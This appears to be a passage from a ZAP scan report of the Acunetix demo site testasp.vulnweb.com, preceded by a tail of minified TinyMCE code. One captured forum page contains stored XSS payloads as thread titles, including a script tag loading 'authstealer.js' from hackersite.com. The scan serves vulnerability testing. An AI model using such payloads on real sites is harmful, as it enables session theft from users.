html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:33 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 327 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:33 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 351 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:34 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 335 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:34 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 291 bytes. |
GET http://testasp.vulnweb.com/sitemap.xml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:35 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/styles.css |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 327 bytes. |
GET http://testasp.vulnweb.com/styles.css HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: text/css Last-Modified: Thu, 29 May 2008 12:11:27 GMT Accept-Ranges: bytes ETag: "cea5331f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:35 GMT Content-Length: 3390 |
| Response Body - size: 3,390 bytes. |
body {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; margin: 0; } td { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } th { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .bodystyle { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .small { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 9px; } .medium { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .big { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 16px; } .xbig { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 24px; } .expanded { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; letter-spacing: 2px; } .justified { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; text-align: justify; } .footer { font-family: "Times New Roman", Times, serif; font-size: 10px; color: #008F00; } .menubar { padding: 3px; border-width: thin; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; margin-top: 5px; margin-bottom: 5px; margin-right: 0px; margin-left: 0px; background-color: #BFFFBF; } A.menu { padding-right: 10px; padding-left: 10px; color: #008F00; text-decoration: none; background-color: #BFFFBF; } A.menu:hover { padding-right: 10px; padding-left: 10px; color: #BFFFBF; text-decoration: none; background-color: #008F00; } .disclaimer { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; padding-top: 0px; padding-right: 10px; padding-bottom: 0px; padding-left: 10px; color: #BFFFBF; } .FramedForm { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #BFFFBF; margin-top: 10px; margin-bottom: 10px; padding: 5px; } .tableheader { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #008F00; color: #BFFFBF; font-weight: bold; } .forumtitle { font-size: 14px; font-weight: bold; text-transform: capitalize; color: #008F00; margin-top: 5px; margin-bottom: 5px; } .forumdescription { margin-left: 15px; } .userinfo { text-align: center; font-weight: bold; display: block; position: relative; width: 100px; } .post { border-top: 1px solid #008F00; border-right: 1px none #008F00; border-bottom: 1px none #008F00; border-left: 1px none #008F00; } .posttitle { border: 1px none #80FF80; background-color: #BFFFBF; font-weight: bold; margin-bottom: 15px; padding: 2px; } INPUT { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } TEXTAREA { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } INPUT.Login { width: 250px; } INPUT.postit { width: 450px; } TEXTAREA.postit { width: 450px; height: 300px; } .path { font-weight: bold; color: #006600; margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; } INPUT.search { } |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 352 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:35 GMT Content-Length: 4594 |
| Response Body - size: 4,594 bytes. |
